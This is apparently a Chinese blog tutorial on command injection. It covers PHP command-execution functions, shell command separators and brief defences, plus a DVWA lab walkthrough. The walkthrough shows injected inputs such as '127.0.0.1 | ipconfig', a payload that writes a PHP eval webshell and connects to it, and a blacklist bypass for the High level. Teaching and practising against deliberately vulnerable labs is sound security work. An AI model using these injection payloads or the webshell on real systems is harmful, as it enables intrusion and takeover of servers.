命令执行漏洞

1、原理:

Web应用程序的某些功能需要调用一些可以执行系统命令的函数,如果函数或者函数的参数能被用户控制,同时没有对用户的输入做严格的过滤,就能将恶意命令通过命令连接符 拼接到正常的命令中,从而随意地执行系统命令,实现getshell。

2、PHP中常见命令执行函数:

system()、exec()、shell_exec()、passthru()

|--------------|-------------------------|-----------------------------------------|-------------------------------------------|-----------------------------------------------------------------------------|
| PHP 函数 | Java 对应方式 | Python 对应方式 | ASP 对应方式(经典 ASP) | ASP.NET 对应方式 |
| system() | Runtime.exec() + 输出流读取 | os.system() | WScript.Shell.Exec | Process.Start |
| exec() | Runtime.exec() + 输出流读取 | subprocess.run(...,capture_output=True) | WScript.Shell.Exec` + `StdOut.ReadAll() | Process.Start` + `StandardOutput.ReadToEnd() |
| shell_exec() | Runtime.exec() + 读取完整输出 | subprocess.run(...).stdout | WScript.Shell.Exec` + `StdOut.ReadAll() | Process.Start` + `StandardOutput.ReadToEnd() |
| passthru() | ProcessBuilder + 实时输出 | subprocess.Popen(..., stdout=PIPE) | WScript.Shell.Exec` + 直接输出 | Process.Start` + `StandardOutput.BaseStream.CopyTo(Response.OutputStream) |

3、常用命令连接符(Windows和Linux通用):

Command1**|**Command2 管道符,将C1执行后输出的结果作为输入传递给C2

Command1**||**Command2 先后执行1,2,只有1执行失败才执行2

Command1**&&**Command2 先后执行1,2,只有1执行成功才执行2

Command1 & Command2 先后执行1,2,无论1执行是否成功

Command1**;**Command2 先后执行1,2,无论1执行是否成功(linux独有)

4、【DVWA】之命令注入

Low

查看源代码,无任何防护

(1)IP:127.0.0.1

(2)IP:127.0.0. | ipconfig

(3)IP:127.0.0. || cd #先后执行1,2,只有1执行失败才执行2

(4)IP:127.0.0.1 && cd #先后执行1,2,只有1执行成功才执行2

(5)127.0.0.1 & dir #先后执行1,2,无论1执行是否成功

(6)获取webshell

127.0.0.1 | echo "<?php @eval($_POST[666]);?>" >666.php

127.0.0.1 | dir

蚁剑连接

http://10.20.0.5/DVWA-master/vulnerabilities/exec/666.php

Medium

查看源代码

(1)IP:127.0.0.1 & cd #先后执行1,2,无论1执行是否成功

(2)IP:127.0.0. | ipconfig

......

High

查看源码,通过黑名单过滤了更多命令连接符,但在过滤'| '时多了一个空格。

127.0.0.1 |cd # |后不接空格绕过黑名单匹配

5、防御方法

(1)过滤常见命令连接符

(2)校验token

(3)使用白名单限制用户输入

相关推荐
带娃的IT创业者1 天前
第4集:配置管理的艺术:环境变量、多环境配置与安全实践
开发语言·python·安全·项目配置·开发基础
white-persist1 天前
Burp Suite模拟器抓包全攻略
前端·网络·安全·web安全·notepad++·原型模式
网安小白的进阶之路1 天前
A模块 系统与网络安全 第四门课 弹性交换网络-3
网络·安全·web安全
安当加密1 天前
基于PostgreSQL的TDE透明加密解决方案:构建数据全生命周期的国密合规安全体系
安全·postgresql·区块链
源文雨2 天前
MacOS 下 Warp ping 局域网设备报错 ping: sendto: No route to host 的解决方法
运维·网络协议·安全·macos·网络安全·ping
周某人姓周2 天前
安全初级(二)HTTP
网络协议·安全·http
Hello.Reader2 天前
在运行中的 Kafka 集群渐进式启用安全零停机实战手册(KRaft/Broker 通用)
分布式·安全·kafka
国科安芯2 天前
关于软错误的常见问题解答
单片机·嵌入式硬件·安全·硬件架构·软件工程
小红帽6152 天前
使用burp工具的intruder模块进行密码爆破
网络·安全·html
老赵聊算法、大模型备案2 天前
2025年6-8月中国大模型备案分析报告
大数据·人工智能·安全·语言模型·aigc